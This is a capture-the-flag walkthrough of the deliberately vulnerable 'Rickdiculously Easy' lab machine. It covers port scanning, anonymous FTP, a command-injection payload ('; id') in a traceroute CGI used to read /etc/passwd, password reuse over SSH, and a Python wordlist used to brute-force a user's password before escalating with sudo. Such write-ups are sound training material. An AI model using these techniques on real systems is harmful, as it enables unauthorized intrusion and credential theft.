CTF Walkthrough - Rickdiculously Easy
Information
Intro
Rick and Morty is a brutal animated comedy created by Justin Roiland. Its main characters are Rick, a genius scientist, and Morty, his grandson. If you enjoy adult animated series, this one is worth watching.
Rickdiculously Easy is a Rick and Morty themed machine, so we can expect several references to the show. However, Rick and Morty knowledge is not needed to complete this machine. The goal is finding several flags, getting a total of 130 points. Let’s go!
Walkthrough
Identification and Enumeration
As always, the first thing to do is identify the target IP. Luckily it answers
to ping requests, so a simple fping will make it:
root@kali:~# fping -aqg 192.168.10.0/24
[...]
192.168.10.113
After some seconds, fping spits a handful of IPs. The only unknown address in
that list is 192.168.10.113, which should be my new guest, and my target IP.
Then, nmap is used to get all of the information about the services running
in the machine. Show me what you
got!
nmap -sT -p- -A -vvv -oA nmap 192.168.10.113
[...]
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt
|_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
22/tcp open ssh? syn-ack
| fingerprint-strings:
| NULL:
|_ Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp open http syn-ack Apache httpd 2.4.27 ((Fedora))
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp open http syn-ack Cockpit web service
|_http-title: Did not follow redirect to https://192.168.10.113:9090/
13337/tcp open unknown syn-ack
| fingerprint-strings:
| NULL:
|_ FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open ssh syn-ack OpenSSH 7.5 (protocol 2.0)
60000/tcp open unknown syn-ack
| fingerprint-strings:
| NULL, ibm-db2:
|_ Welcome to Ricks half baked reverse shell...
That’s a lot of info! Let’s go step by step.
Flag 1
Well, if you paid a little attention a second ago, you just saw the first flag… If you connect to TCP port 13337, you receive the first flag. Simple as that:
root@kali:~# nc 192.168.10.113 13337
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Total points: 10
Flag 2
nmap also shows a promising FLAG.txt anonymously readable:
root@kali:~# lftp 192.168.10.113
lftp 192.168.10.113:~> cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points
Another flag!
Total points: 20
Flag 3
The next thing that catches my attention is the “Rick’s half baked reverse
shell”. When connecting with netcat, we get a very limited shell, able to
execute just a few commands:
root@kali:~# nc 192.168.10.113 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
# pwd
/root/blackhole/
# whoami
root
We got the third flag! However, running other basic commands in this shell,
such as cd, echo or touch, doesn’t work:
# cd
Permission Denied.
# echo potato
echo potato: command not found
# touch potato
touch potato: command not found
This makes me thing this is not an actual shell, but a limited interactive interpreter. I’ll park this by now…
Total points: 30
Flag 4
I notice a weird thing about port 22. nmap shows a “Welcome to Ubuntu”
banner, but the service is not SSH. By connecting directly with netcat, the
service just returns the banner and disconnects:
root@kali:~# nc 192.168.10.113 22
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
root@kali:~#
It looks like the machine is trolling us… I decide this service is unusable, and go to the next one.
Port 9090 presents a HTTP+HTTPS (HTTP with redirection to HTTPS on the same port) service, giving us access to the Fedora web administration portal:
We immediately notice two things: First, we got the 4th flag: FLAG {There is
no Zeus, in your face!} - 10 Points. Second, the web portal is “altered”, and
it doesn’t have a password field. Well, maybe is a hint, telling us this is not
the way to go.
Total points: 40
Flag 5
There are two services left: SSH on port 22222 (accepting password login), and HTTP on port 80. As we don’t have a user/password list to use on SSH, let’s explore HTTP.
Accessing through the web browser, we get to the Morty’s Cool Website:
It doesn’t seem to have any kind of link or further information, but maybe it has some other files:
root@kali:~# dirb 'http://192.168.10.113'
-----------------
DIRB v2.22
By The Dark Raver
-----------------
[...]
---- Scanning URL: http://192.168.10.113/ ----
+ http://192.168.10.113/cgi-bin/ (CODE:403|SIZE:217)
+ http://192.168.10.113/index.html (CODE:200|SIZE:326)
==> DIRECTORY: http://192.168.10.113/passwords/
+ http://192.168.10.113/robots.txt (CODE:200|SIZE:126)
[...]
We found at least 2 interesting resources, /passwords/ and robots.txt. The
first path is a listable directory with two files: passwords.html and
FLAG.txt. We found our 5th flag: FLAG{Yeah d- just don't do it.} - 10
Points!
Total points: 50
Flag 6
Then, we access /passwords/passwords.html. It seems Morty stored some
passwords here, and Rick had to hide them… How do you hide something in a
HTML file?
We got a password, winter. We’ll make note of it and find somewhere we can
use it.
The other interesting resource found with dirb was robots.txt:
They're Robots Morty! It's ok to shoot them! They're just Robots!
/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*
That root_shell.cgi file looks super interesting… But it’s just another
joke of the machine! Maybe we have more luck with tracertool.cgi:
It seems it’s a tool making use of tracepath or traceroute to give us
information about the path followed by the network traffic generated by the
machine. If the input from the user is not correctly treated, we may be able to
execute code in the machine…
Bingo!
What happened here? Well, tracertool.cgi is programmed to get the input from
the user (GET parameter ip) and pass it directly to a shell interpreter
executing traceroute, like this:
$ traceroute <USER_INPUT>
$ traceroute 127.0.0.1
Everything normal so far. But what if <USER_INPUT> is not an IP address, but
something like ; id?
$ traceroute <USER_INPUT>
$ traceroute ; id
We are effectively chaining two commands. traceroute without any parameters
will just print the usage string to stderr (that’s why we don’t see any
errors on the website, as we only receive stdout), then ; tells the
interpreter that the command is over (just like a \n character would), and it
starts executing the next command of the line, id. This vulnerability allows
code execution on the machine, and we can print the contents of /etc/passwd
with the cat command:
It seems that the cat command… Actually prints a cat! That was
unexpected ☺ We need to use an alternative:
That’s better! We now have three non-system users: RickSanchez, Morty and
Summer. We can try to login in the machine with the password we recovered
before, winter:
Perfect! On Summer’s home directory we find our 6th flag:
[Summer@localhost ~]$ sed '' FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points
Total points: 60
Flag 7
Summer has read access to all of the files stored on other users’ home folders:
[Summer@localhost ~]$ tree /home
/home
├── Morty
│ ├── journal.txt.zip
│ └── Safe_Password.jpg
├── RickSanchez
│ ├── RICKS_SAFE
│ │ └── safe
│ └── ThisDoesntContainAnyFlags
│ └── NotAFlag.txt
└── Summer
└── FLAG.txt
5 directories, 5 files
That NotAFlag.txt file inside Rick’s home is suspicious… But, as advised,
it doesn’t contain any flags! Ignoring the trolling not-a-flag file, we have
some other 3 interesting files we download to our machine.
Morty has two files: a password-protected journal zip, and an image of Rick,
named Safe_Password.jpg… Maybe the file has something hidden in it:
root@kali:~/boot2root/rickdiculously_easy# strings Safe_Password.jpg | awk '{print length, $0}' | sort -rn
73 8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
45 %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
43 &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
19 0D000D\DDDD\t\\\\\t
11 c';F3RQEY!E
10 b\ZCo2HFbn
10 "$$848`44`
8 S 8<5MTA
[... more garbage ...]
Straightforward! The file is directly telling us that Meeseek is the password
for journal.txt.zip. We verify that’s the correct password, and we get our
7th flag: FLAG: {131333} - 20 Points.
Total points: 80
Flag 8
Morty’s journal gives us the hint that the 7th flag we found is something like
the password to a Rick’s safe, or something like that. Hey, there was a
safe file in Rick’s home directory:
[Summer@localhost ~]$ file /home/RickSanchez/RICKS_SAFE/safe
/home/RickSanchez/RICKS_SAFE/safe: ELF 64-bit LSB executable, x86-64, version 1
(SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for
GNU/Linux 2.6.32, BuildID[sha1]=6788eee358d9e51e369472b52e684b7d6da7f1ce, not
stripped
The safe is an executable file. If we copy it to Summer’s home folder, give execution permissions, and execute it, all we got is… Garbage!
[Summer@localhost ~]$ cp /home/RickSanchez/RICKS_SAFE/safe .
[Summer@localhost ~]$ chmod +x safe
[Summer@localhost ~]$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
[Summer@localhost ~]$ ./safe potato
decrypt: �CG�,�eo%m
��8��u�n���#�+q��(���Dv3+Mܯ����io���6��~뇈~Fm~t1��G�����_^�黢rޥunz����V TP|���c�(ĭ(���vÓ��!lH���=
���4C��c��2���O�C���"�
����5M�v�m��PfL���A���X.:Z��3D��3C�;�|�H�L�U�e���&]
�xw�O�t����( Z�.
RΑ�
y�2�k*o~��O =s ��Q���*muxk����d�lC�P�U WɤF��g�m�J�� @
However, we can see that the garbage output starts with decrypt:. Maybe
there’s a string stored in the executable, and it’s waiting for the correct
safe password… Morty gave as a hint before:
[Summer@localhost ~]$ ./safe 131333
decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to
generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order
1 uppercase character
1 digit
One of the words in my old bands name.� @
We get the 8th flag, and a hint for Rick’s password!
Total points: 100
Flag 9
Using a little Google-fu, we find Rick’s old band name: “The Flesh Curtains”. So we need to generate a dictionary with passwords with this form:
<UP_CHR><DIGIT><The/Flesh/Curtains>
<UP_CHR>: One uppercase character, A-Z.<DIGIT>: One digit, 0-9.<The/Flesh/Curtains>: One of these three words.
A super simple Python script is enough to generate the dictionary:
import string
words = ['The', 'Flesh', 'Curtains']
for i in string.ascii_uppercase:
for j in string.digits:
for k in words:
print('{0}{1}{2}'.format(i, j, k))
We generate a password dictionary and try to login using user RickSanchez:
We got Rick’s password, P7Curtains! There was a reference to sudo in his
safe, so probably this user have permissions to use it…
We got root, and the last flag of the machine! FLAG: {Ionic Defibrillator} -
30 points
Total points: 130
Vulnerable machine completed!
Final words
Easy but fun machine, with a lot of references to Rick and Morty, different types of vulnerabilities, and some trolling here and there. If you like the series, this machine is worth a try, even if it’s easier than you are used to.
All done here, have a nice day!